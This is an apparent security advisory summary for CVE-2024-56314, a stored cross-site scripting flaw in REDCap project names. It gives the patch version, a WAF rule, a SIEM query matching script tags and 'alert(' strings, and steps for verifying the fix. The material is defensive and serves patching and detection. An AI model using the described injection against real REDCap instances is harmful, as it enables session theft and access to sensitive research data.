CVE-2024-56314
📋 TL;DR
This stored XSS vulnerability in REDCap allows authenticated users to inject malicious scripts into project names. When other users click on these project names, the scripts execute in their browser context, potentially stealing session cookies or performing unauthorized actions. All REDCap instances running vulnerable versions with authenticated users are affected.
💻 Affected Systems
- REDCap
📦 What is this software?
Redcap by Vanderbilt
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full system access, pivot to internal networks, and exfiltrate sensitive research data.
Likely Case
Authenticated users with malicious intent could steal other users' session cookies, impersonate them, and potentially access or modify sensitive research data.
If Mitigated
With proper input validation and output encoding, the payload would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 14.9.7 or later
Vendor Advisory: https://www.evms.edu/research/resources_services/redcap/redcap_change_log/
Restart Required: No
Instructions:
1. Backup your REDCap instance. 2. Download REDCap version 14.9.7 or later from the official Vanderbilt REDCap Consortium site. 3. Follow the standard REDCap upgrade procedure for your installation method (manual, Docker, etc.). 4. Verify the upgrade completed successfully.
🔧 Temporary Workarounds
Input Validation Web Application Firewall Rule
allAdd WAF rules to block XSS payloads in project name fields
# Example ModSecurity rule: SecRule ARGS:project_name "@detectXSS" "id:1001,phase:2,deny,status:403"
Temporary User Permission Restriction
allRestrict project creation/modification permissions to trusted administrators only
# Modify REDCap user rights to remove project creation privileges for non-admin users
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to prevent script execution from untrusted sources
- Enable additional logging and monitoring for project name modifications and unusual user activity
🔍 How to Verify
Check if Vulnerable:
Check if your REDCap version is 14.9.6 or earlier in the Control Center under 'REDCap Version Info'Check Version:
Check REDCap Control Center → 'REDCap Version Info' or database table redcap_config where field_name = 'redcap_version'Verify Fix Applied:
After patching, verify version is 14.9.7 or later and test that script tags in project names are properly sanitized📡 Detection & Monitoring
Log Indicators:
- Unusual project name modifications containing script tags or JavaScript code
- Multiple failed login attempts followed by project creation
Network Indicators:
- Outbound connections to suspicious domains after project access
- Unusual HTTP POST requests to project modification endpoints
SIEM Query:
source="redcap_logs" AND (message="*project_name*" AND message="*<script>*") OR (message="*alert(*" AND message="*project*")